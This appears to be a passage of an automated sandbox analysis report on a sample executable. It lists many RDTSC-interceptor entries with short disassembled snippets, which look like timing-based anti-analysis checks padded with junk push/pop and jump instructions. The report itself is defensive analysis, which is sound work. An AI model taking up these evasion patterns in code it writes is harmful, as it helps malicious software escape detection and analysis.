Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 840277 second address: 84027D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84027D second address: 8402BC instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBAD522AB7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f jmp 00007FCBAD522AB5h 0x00000014 jl 00007FCBAD522AAEh 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845E6C second address: 845E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844A97 second address: 844AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB5h 0x00000009 js 00007FCBAD522AA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844DB8 second address: 844DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FCBACB2D116h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844DC4 second address: 844DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844DCA second address: 844DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844DCE second address: 844DDB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84520E second address: 845227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBACB2D11Dh 0x00000009 jnp 00007FCBACB2D116h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845227 second address: 84522C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8447FB second address: 844800 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 844800 second address: 844806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8454E6 second address: 8454F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jp 00007FCBACB2D116h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845B0B second address: 845B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845B0F second address: 845B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845B17 second address: 845B24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jo 00007FCBAD522AA6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845B24 second address: 845B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FCBACB2D118h 0x0000000f jng 00007FCBACB2D11Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 845B43 second address: 845B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBAD522AB0h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84901A second address: 84901E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84901E second address: 849024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 849024 second address: 84902E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C3518 second address: 7C3522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCBAD522AA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C3522 second address: 7C3537 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007FCBACB2D116h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007FCBACB2D116h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C3537 second address: 7C353D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C353D second address: 7C354E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jc 00007FCBACB2D11Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84DD52 second address: 84DD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 84DD56 second address: 84DD81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCBACB2D124h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FCBACB2D11Ch 0x00000011 popad 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 851BC3 second address: 851BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FCBAD522AAEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8516FB second address: 8516FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8516FF second address: 851722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e pushad 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 851722 second address: 851728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 851728 second address: 851741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCBAD522AB2h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 853A78 second address: 853A82 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCBACB2D11Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85997A second address: 859983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859AAD second address: 859ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push esi 0x00000008 jmp 00007FCBACB2D121h 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859ACB second address: 859ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859C26 second address: 859C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859D87 second address: 859D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859D8B second address: 859D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859EC9 second address: 859EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FCBAD522AA6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007FCBAD522AAAh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FCBAD522AAFh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859EF7 second address: 859EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859EFB second address: 859EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859EFF second address: 859F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FCBACB2D126h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 859F21 second address: 859F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8080D1 second address: 8080DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8080DB second address: 8080FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FCBAD522AA6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8080FA second address: 808112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 808112 second address: 80812A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80812A second address: 80816D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FCBACB2D118h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 movsx ecx, dx 0x00000026 mov di, 1363h 0x0000002a push 00000004h 0x0000002c mov ecx, dword ptr [ebp+122D3750h] 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jnl 00007FCBACB2D11Ch 0x0000003b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85ECCD second address: 85ECD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85ECD2 second address: 85ECD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85DF0E second address: 85DF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FCBAD522AA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85DF1B second address: 85DF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E0A3 second address: 85E0A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E0A9 second address: 85E0AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E0AF second address: 85E0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E0B3 second address: 85E0B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E0B7 second address: 85E0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FCBAD522AACh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E872 second address: 85E887 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D121h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 85E887 second address: 85E890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861B72 second address: 861B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861B76 second address: 861B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AADh 0x00000007 ja 00007FCBAD522AA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8612CA second address: 8612E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FCBACB2D116h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861560 second address: 861564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861564 second address: 8615A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FCBACB2D131h 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FCBACB2D123h 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8615A8 second address: 8615AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8615AC second address: 8615B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861864 second address: 86186A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86186A second address: 86186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86186E second address: 86187C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86187C second address: 861882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 861882 second address: 8618A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8618A1 second address: 8618BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCBACB2D122h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C005E second address: 7C0085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCBAD522AB1h 0x0000000c jmp 00007FCBAD522AAFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C0085 second address: 7C009B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D122h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 867695 second address: 86769B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86769B second address: 8676AF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBACB2D116h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FCBACB2D116h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8676AF second address: 8676B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8676B3 second address: 8676B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8676B9 second address: 8676BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 867979 second address: 86799D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBACB2D11Dh 0x0000000b jmp 00007FCBACB2D11Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86799D second address: 8679A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8679A1 second address: 8679CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBACB2D122h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d jmp 00007FCBACB2D120h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8679CE second address: 8679D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86886D second address: 868884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBACB2D123h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 868884 second address: 8688A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ecx 0x00000008 jmp 00007FCBAD522AAFh 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FCBAD522AA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8688A3 second address: 8688A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 869136 second address: 86913A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86913A second address: 869140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86DC9A second address: 86DCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 86DCA0 second address: 86DCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8709FE second address: 870A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 870A04 second address: 870A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FCBACB2D116h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 870B63 second address: 870B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AABh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 870CE8 second address: 870CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8710F1 second address: 871107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCBAD522AAEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871255 second address: 87125B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
